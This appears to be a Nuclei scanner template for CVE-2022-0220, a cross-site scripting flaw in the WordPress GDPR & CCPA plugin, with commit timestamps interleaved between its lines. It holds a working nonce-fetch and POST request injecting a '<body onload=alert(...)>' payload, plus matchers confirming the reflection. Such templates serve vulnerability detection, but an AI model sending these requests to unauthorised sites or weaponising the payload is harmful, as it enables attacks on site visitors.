2022-07-18 13:40:25 +00:00
id : CVE-2022-0220
info :
2022-09-10 01:55:52 +00:00
name : WordPress GDPR & CCPA <1.9.27 - Cross-Site Scripting
2022-07-18 13:40:25 +00:00
author : daffainfo
2022-09-10 02:12:57 +00:00
severity : medium
2022-07-25 16:41:56 +00:00
description : |
2022-09-10 02:12:57 +00:00
WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation : Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users.
2022-07-25 16:49:41 +00:00
reference :
2022-07-25 16:41:56 +00:00
- https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059
2022-07-26 06:24:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0220
2024-06-07 10:04:29 +00:00
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2022-08-25 06:30:23 +00:00
classification :
2022-09-10 02:12:57 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
2022-09-10 01:55:52 +00:00
cve-id : CVE-2022-0220
2023-07-11 19:49:27 +00:00
cwe-id : CWE-116
2023-08-31 11:46:18 +00:00
epss-score : 0.00124
2024-06-07 10:04:29 +00:00
epss-percentile : 0.4686
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : welaunch
product : wordpress_gdpr\&ccpa
2023-09-06 11:59:08 +00:00
framework : wordpress
2024-01-14 09:21:50 +00:00
tags : cve2022,cve,wpscan,wordpress,wp-plugin,wp,xss,unauth,welaunch
2022-07-18 13:40:25 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-07-18 13:40:25 +00:00
- raw :
2022-07-25 16:41:56 +00:00
- |
GET /wp-admin HTTP/1.1
Host : {{Hostname}}
2022-07-18 13:40:25 +00:00
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-07-25 16:41:56 +00:00
action=check_privacy_settings&settings%5B40%5D=40&settings%5B41%5D=%3cbody%20onload%3dalert(document.domain)%3e&nonce={{nonce}}
2022-07-18 13:57:48 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-07-25 16:41:56 +00:00
max-redirects : 2
2022-07-18 13:40:25 +00:00
matchers :
2022-07-25 16:41:56 +00:00
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- "contains(header_2, 'text/html')"
2022-07-25 16:41:56 +00:00
- "status_code_2 == 200"
2022-08-24 13:29:03 +00:00
- "contains(body_2, '<body onload=alert(document.domain)>') && contains(body_2, '/wp-content/plugins/')"
2022-07-25 16:41:56 +00:00
condition : and
2022-07-18 13:40:25 +00:00
2022-07-25 16:41:56 +00:00
extractors :
- type : regex
name : nonce
group : 1
regex :
- 'nonce":"([0-9a-z]+)'
internal : true
2023-07-11 19:49:27 +00:00
part : body
2024-01-26 08:31:11 +00:00
# digest: 4b0a00483046022100b3722d9e009d5c1c3e2d7b7b51c634728bdcde176567f826c364a6a5a919c92f022100d014f3e7b4ad3ede1574768235689cbe63eb8cfb5429fa3bf3cf27308243695b:922c64590222798bb761d5b6d8e72950